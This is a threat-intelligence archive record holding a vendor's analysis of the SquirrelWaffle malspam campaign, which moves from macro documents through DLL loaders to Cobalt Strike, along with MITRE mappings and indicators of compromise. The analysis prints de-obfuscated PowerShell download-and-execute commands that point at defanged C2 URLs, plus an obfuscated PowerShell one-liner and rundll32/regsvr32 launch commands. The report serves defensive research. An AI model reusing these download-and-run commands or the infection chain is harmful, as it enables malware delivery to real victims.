{
	"id": "14490058-dfbb-4fe3-b2fd-0ff3638f9c40",
	"created_at": "2026-04-06T00:14:41.240074Z",
	"updated_at": "2026-04-10T03:31:13.746377Z",
	"deleted_at": null,
	"sha1_hash": "7b4cd8c608e511a70914032acdd31b3673afd190",
	"title": "A Virtual Baffle to Battle SquirrelWaffle",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2084231,
	"plain_text": "A Virtual Baffle to Battle SquirrelWaffle\r\nArchived: 2026-04-05 13:50:23 UTC\r\nBy: Max Malyutin – Orion Threat Research Team Leader\r\nWhile tracking malicious spam campaigns at the beginning of September 2021, we discovered a new villain that joined known major actors including Trickbot, Bazarloader, Ursnif, Dridex, and IcedID in the email-based malware landscape.\r\nEmail-based campaigns are used to deliver and distribute large-scale phishing malspam and deploy different types of malware. These malicious emails often contain a .ZIP attachment, a Microsoft Office document, or a URL link. The weaponized documents are responsible for downloading and executing next-stage malware payloads.\r\nThe new kid on the block’s name is Squirrelwaffle, and it was first seen in the wild at the start of September 2021.\r\nSquirrelwaffle MalDoc samples are tagged by researchers as “TR”, which stands for the malspam distribution infrastructure, a tag that indicates a particular malspam distribution affiliate.\r\nWe started seeing samples uploaded into open malware databases (such as bazaar.abuse):\r\nWhen inspecting SquirrelWaffle on VirusTotal, we noticed there are additional samples, as can be seen here:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 1 of 19\n\nSquirrelwaffle infection chain overview\r\nSquirrelwaffle compromises victims via a malspam campaign. Currently, Squirrelwaffle emails deliver a malicious URL link which leads to a ZIP file as part of the email content.\r\nThe victim downloads a ZIP file that contains a weaponized Microsoft Office document. The malicious document contains macro code and a fake template that lures the victim to click on Enable Content. After the macros are executed, the malicious document acts as a dropper. 
It drops a VBS file stored inside the MalDoc to disk and launches it via a cscript command.\r\nNext, the VBS script downloads five DLL modules from five different URLs via a PowerShell command and invokes these modules through a rundll32 command.\r\nCurrently, we know that the DLL modules enumerate the compromised host and download the next-stage payload from a Command-and-Control (C2) server. The downloaded file has a TXT extension. The TXT file is a portable executable file (EXE), which in fact is a Cobalt Strike beacon.\r\nMalware-Traffic-Analysis shared Squirrelwaffle-to-Cobalt-Strike indicators and artifacts:\r\nhttps://www.malware-traffic-analysis.net/2021/09/17/index.html\r\nInfection chain of Word Squirrelwaffle releases (14 September – ):\r\n1. The user receives a phishing email with a malicious URL link to a ZIP file which stores a weaponized Microsoft Office document.\r\n2. The user opens the malicious weaponized Word document and is lured into clicking on “Enable content” (macros).\r\n3. The malicious VBA macro is executed and drops the VBS (Visual Basic Script) file to the ProgramData directory.\r\n4. The malicious VBA macro executes the VBS file via cscript.\r\n5. The VBS script executes PowerShell and CMD processes (rundll32 is executed via CMD).\r\n6. The PowerShell command downloads the Squirrelwaffle modules (DLLs).\r\n7. rundll32 executes the Squirrelwaffle modules with the ldr function.\r\n8. Enumeration actions are performed on the compromised host.\r\n9. Finally, a Cobalt Strike beacon is dropped and launched.\r\nUpdate 20/09/2021\r\nWe have observed another Squirrelwaffle infection. In this new variant, threat actors use malicious Excel documents instead of Word documents. 
The malicious Excel documents contain macro v4 (XLM) code instead of the VBA code used in the Word documents.\r\nFurthermore, they changed the execution and download methods.\r\nInfection chain of Excel Squirrelwaffle releases (20 September – ):\r\n1. The user opens the malicious weaponized Excel document and is lured into clicking on “Enable content” (macros v4).\r\n2. The malicious macro v4 code is executed and downloads masqueraded DLL payloads from a C2 server.\r\n3. The malicious macro v4 code executes the masqueraded DLL payloads via a regsvr32 command line.\r\n4. regsvr32 executes the Squirrelwaffle modules.\r\nMITRE Attack-Navigator\r\nSquirrelwaffle infection chain analysis\r\nThe infection chain starts with a phishing email vector. Phishing technique T1566 has two sub-techniques: Spearphishing Attachment T1566.001 and Spearphishing Link T1566.002.\r\nSquirrelwaffle currently uses the Spearphishing Link technique by sending malicious emails with a URL to a ZIP file that contains the malicious Word document.\r\nurlhaus.abuse.ch tag: SQUIRRELWAFFLE\r\nThreat actors’ motivation is to lure the victim into interacting with the phishing email and downloading the ZIP file.\r\nThe next step of the infection is based on the user’s interaction with the phishing email. This step is related to the User Execution technique T1204, which is part of the Execution tactic TA0002.\r\nThis technique has two sub-techniques: Malicious Link T1204.001 and Malicious File T1204.002.\r\nThe user downloads the malicious ZIP file by using the URL link in the phishing email. 
The ZIP file contains a Microsoft Office Word document.\r\nTo lure the victim into clicking on “Enable Content”, threat actors use a fake DocuSign template message.\r\nBelow, you can see an example of the Squirrelwaffle MalDoc requesting the user to click on the security warning button “Enable Content”. This allows the malicious document to execute code stored as a macro.\r\nOnce macros are enabled, the VBA code executes (Command and Scripting Interpreter: Visual Basic, T1059.005) and runs the AutoOpen function.\r\nThe AutoOpen macro runs automatically after opening the document and selecting “Enable Content”.\r\nThe AutoOpen function content leads us to the bxh.eFile macro:\r\nThe bxh function contains obfuscated VBA code which is decoded via StrReverse, which “Returns a string in which the character order of a specified string is reversed.”\r\nThe artifacts extracted from the bxh function:\r\nPath: C:\\ProgramData\r\nFile Name: pin.vbs\r\nExecution command: cmd /k cscript .exe C:\\ProgramData\\pin.vbs\r\nUsing the OLEVBA tool, we have found several interesting artifacts:\r\nThe threat actors use a different technique to hide malicious code/strings such as URLs, IPs, commands, or even shellcode inside the malicious document.\r\nWe kept digging inside the MalDoc file and found a Form (t2) containing malicious VBS code.\r\nThe obfuscated VBS code is dropped to the C:\\ProgramData directory:\r\nThe VBS file is written to disk via the MalDoc file:\r\nThe next step in the attack happens when macros are enabled. 
This executes a cmd command that spawns a cscript.exe process.\r\nExecution command: cmd /k cscript .exe C:\\ProgramData\\pin.vbs\r\nThe cscript process executes the pin.vbs file:\r\nWe have analyzed the VBS code and de-obfuscated it:\r\nLL1\\2\\3\\4\\5 (lines 6-9, 11-14, 16-19, 21-24 and 26-29) store PowerShell commands (de-obfuscated):\r\nIEX \"(New-Object Net.WebClient).DownloadFile('hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html','C:\\ProgramData\\www1.dll')\"| IEX\r\nIEX (New-Object Net.WebClient).DownloadFile('hxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html','C:\\ProgramData\\www2.dll')|IEX\r\nIEX (New-Object Net.WebClient).DownloadFile('hxxps://bussinessz[.]ml/ze8pCNTIkrIS/pt.html','C:\\ProgramData\\www3.dll')|IEX\r\nIEX (New-Object Net.WebClient).DownloadFile('hxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html','C:\\ProgramData\\www4.dll')\r\nIEX (New-Object Net.WebClient).DownloadFile('hxxps://bonus[.]corporatebusinessmachines[.]co[.]in/1Y0qVNce/pt.html','C:\\ProgramData\\www5.dll')|\r\nLines 34-38 execute a PowerShell instance with each command above (five PS instances in total).\r\nEach PowerShell command uses the WebClient class and its DownloadFile method, which allows the PowerShell command to download a DLL file and drop it to the C:\\ProgramData directory.\r\nOne of the PowerShell instances' command line:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html'',''C:\\ProgramData\\www1.dll'')';$FOOX = ($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\r\nBy sniffing the network packets of the PowerShell instances, we have found five IP addresses related to the five URLs observed in the VBS 
script:\r\n108[.]167[.]172[.]125\r\n192[.]185[.]52[.]124\r\n204[.]11[.]58[.]87\r\n162[.]241[.]85[.]65\r\nIn line 39, threat actors use a Sleep function. The function sleeps for 15 seconds before the next step of the execution, to allow all the DLL payloads to finish downloading:\r\nWScript.Sleep(15000)\r\nAfter the Sleep action, the VBS script executes cmd.exe processes that spawn rundll32.exe with the following commands:\r\ncmd /c rundll32.exe C:\\ProgramData\\www1.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www2.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www3.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www4.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www5.dll,ldr\r\nThe CMD command spawns a rundll32 process five times to load the downloaded DLLs via the ldr export; the Squirrelwaffle DLL payloads are named LdrLoader after this export function.\r\nThe cscript script (pin.vbs) executes CMD and PowerShell processes:\r\nFull process tree execution flow:\r\nThe downloaded DLL modules (LdrLoader) are all the same file. Threat actors have five URLs, each storing the DLL module. We believe that this is a backup method in case one of the URLs is not responding.\r\nUpdate 20/09/2021\r\nWe have detected a new Squirrelwaffle sample, which this time is a malicious Excel document.\r\nThe Excel documents also have the unique file name pattern diagram_[RandomChar0-9].xls\r\nThe new Excel documents use a new fake template to lure the victim into clicking on the “Enable Content” security button:\r\nThe threat actors use several defensive evasion techniques to bypass security applications, AVs, and EDRs. 
These techniques make researchers’ and security analysts’ lives harder:\r\nHidden sheets\r\nWhite font color for the macros\r\nObfuscation and scrambling of the macros across different sheets\r\nHidden sheets\r\nWhite macro font color\r\nObfuscation and scrambling of the macros across different sheets\r\nThe macro type differs from the Word documents. In Word, threat actors use VBA code, while in Excel the macro type is macro v4 (XLM).\r\nmacro v4 (XLM), example:\r\nIn both Excel and Word documents, threat actors use the “Auto Open” function to execute the macros.\r\nAfter extracting some artifacts, we have found the following:\r\nWin API:\r\nKernel32 CreateDirectoryA\r\nUrlmon URLDownloadToFileA\r\nShell32 ShellExecuteA\r\nC2 URL:\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec[.]html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec[.]html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec[.]html\r\nFile full path and name:\r\nC:\\Datop\\test.test\r\nC:\\Datop\\test1.test\r\nC:\\Datop\\test2.test\r\nExecution command:\r\nregsvr32 C:\\Datop\\test*.test\r\nThreat actors changed the download and execution methods.\r\nFor the download, they use the urlmon URLDownloadToFileA Win API function, and for the execution, they use Shell32 ShellExecuteA.\r\nIn this scenario, we have detected three DLL payloads instead of five (Word document flow). 
DLL payloads are executed by abusing the legitimate Microsoft binary Regsvr32 (a LOLBin, “Living off the land”).\r\nNetwork connections to the C2 servers that store the DLL payloads, performed by the Excel document:\r\n108[.]167[.]165[.]249\r\n95[.]101[.]89[.]74\r\nFull execution flow:\r\nIndicators of compromise\r\nMalDoc\r\nce31d139e6ea2591a8a15fcf37232f97c799e9c5d1410ef86b54a444a7d24d0f\r\n77c8d399c3cdbb22502432f6ab49a8e56a2a8e4bf9bd02b37797a0ae5962b7d6\r\naaea40485a04b071bd65fc732e70630b314cdadf4f03ba9b7a0030ccf63b1115\r\n637af43b3f656ffa8839ab8f23ff2aad7910cc4bd9ed0551d337a02341864e05\r\n079a22b70109d00f571ea22079cde3baf9ebe6a3afd93347e09c38c7fccf38dc\r\na56c6b3d58c66042effa180738197415d840443ba839bb7f45042bdb9e51c04f\r\nb7fa56ddedd0fff91af460edc504574ddc7b1df97d33d635d854e71a7be34060\r\n0e52e26aff6f4cf678515e7c1a491603085e717458cfc12d2b95d46c98eda7ba\r\n783e3b86c24af82773b0dae3e738c46a79de252b1bcc5945b65da0d040ee6e9d\r\n65f594b4cb31e25f711dd954700bab6d2ac507bd7aab184cc500812b08f8ee03\r\n3f453d0703fa81709d25c6ade25215066f38abceec9699b7b49fb9b4171bbb50\r\n182a11ae9b66c9abcd9fd9dbd7a0176a5895f354443e31ab3258182ca62d3a47\r\n5401103614610b1e109c674b2f90732e0a056be81dbdd8886324aa2d41f0cf2a\r\nfc42fbe6525ef4b976bca50eb1c4be6c1696e180c55fbeb5f1c9ce5d32957c88\r\nMalDoc C2 Servers\r\nghapan[.]com\r\nyoowi[.]net\r\ngruasingenieria[.]pe\r\nchaturanga[.]groopy[.]com\r\nlotolands[.]com\r\nbonus[.]corporatebusinessmachines[.]co[.]in\r\nbussiness-z[.]ml\r\nperfectdemos[.]com\r\ncablingpoint[.]com\r\npriyacareers[.]com\r\nDLL loader 
payloads\r\nad8cb4504a5af45ffa91699b017ffa0bc9808e1b170027ab54fe31661279b9b6\r\n813a9b03c6c1caec4eca8a867dcfbda7860bca6a5d481acb4c131c1a868d4b48\r\n0d66e879f6e7bfa3ab9eb864094912ffd59c14792ed1d2e087e465e8098150fb\r\n671f477c3039786c5f3553760377be03b91bfb66f31ba9370ed2193192cf5b4e\r\n85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939\r\nDLL loader C2 Servers\r\njhehosting[.]com\r\nhrms[.]prodigygroupindia[.]com\r\nbartek-lenart[.]pl\r\ncentralfloridaasphalt[.]com\r\namjsys[.]com\r\nmercyfoundationcio[.]org\r\nnovamarketing[.]com[.]pk\r\nSource: https://www.cynet.com/understanding-squirrelwaffle/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cynet.com/understanding-squirrelwaffle/"
	],
	"report_names": [
		"understanding-squirrelwaffle"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434481,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.pdf",
		"text": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.txt",
		"img": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.jpg"
	}
}